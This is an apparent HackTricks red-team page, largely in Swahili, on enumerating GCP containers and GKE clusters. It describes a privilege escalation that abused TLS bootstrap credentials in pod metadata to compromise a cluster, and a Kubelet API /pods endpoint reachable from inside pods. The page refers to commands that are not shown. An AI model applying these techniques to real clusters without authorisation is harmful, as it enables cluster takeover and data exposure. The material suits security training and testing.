GCP - Containers & GKE Enum
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Katika GCP containers unaweza kupata huduma nyingi zinazotegemea kontena ambazo GCP inatoa, hapa unaweza kuona jinsi ya kuhesabu zile za kawaida zaidi:
Katika ukurasa ufuatao unaweza kuangalia jinsi ya kudhulumu ruhusa za kontena ili kupandisha mamlaka:
GCP - Container PrivescHizi ni kundi la mashine (nodes) zinazounda vikundi vya kubernetes.
Kwa maelezo kuhusu nini Kubernetes angalia ukurasa huu:
Kubernetes PentestingKwanza, unaweza kuangalia kama kuna vikundi vyovyote vya Kubernetes vinavyokuwepo katika mradi wako.
Ikiwa una klasta, unaweza kufanya gcloud
ikae kiotomatiki kuunda faili yako ya ~/.kube/config
. Faili hii inatumika kukuthibitisha unapoitumia kubectl, CLI asilia ya kuingiliana na klasta za K8s. Jaribu amri hii.
Kisha, angalia faili ya ~/.kube/config
kuona akreditivu zilizozalishwa. Faili hii itatumika kuimarisha tokeni za ufikiaji kiotomatiki kulingana na kitambulisho sawa ambacho kikao chako cha gcloud
kinatumia. Hii kwa hakika inahitaji ruhusa sahihi kuwepo.
Mara hii imewekwa, unaweza kujaribu amri ifuatayo kupata usanidi wa klasta.
You can read more about gcloud
for containers here.
This is a simple script to enumerate kubernetes in GCP: https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_k8s_enum
Initially this privilege escalation technique allowed to privesc inside the GKE cluster effectively allowing an attacker to fully compromise it.
This is because GKE provides TLS Bootstrap credentials in the metadata, which is accessible by anyone by just compromising a pod.
The technique used is explained in the following posts:
Ans this tool was created to automate the process: https://github.com/4ARMED/kubeletmein
However, the technique abused the fact that with the metadata credentials it was possible to generate a CSR (Certificate Signing Request) for a new node, which was automatically approved. In my test I checked that those requests aren't automatically approved anymore, so I'm not sure if this technique is still valid.
In this post iligundulika kuwa kuna anwani ya Kubelet API inayopatikana kutoka ndani ya pod katika GKE ikitoa maelezo ya pods zinazotembea:
Hata kama API haiwezeshi kubadilisha rasilimali, inaweza kuwa inawezekana kupata taarifa nyeti katika jibu. Kituo /pods kilipatikana kwa kutumia Kiterunner.
Jifunze & fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze & fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)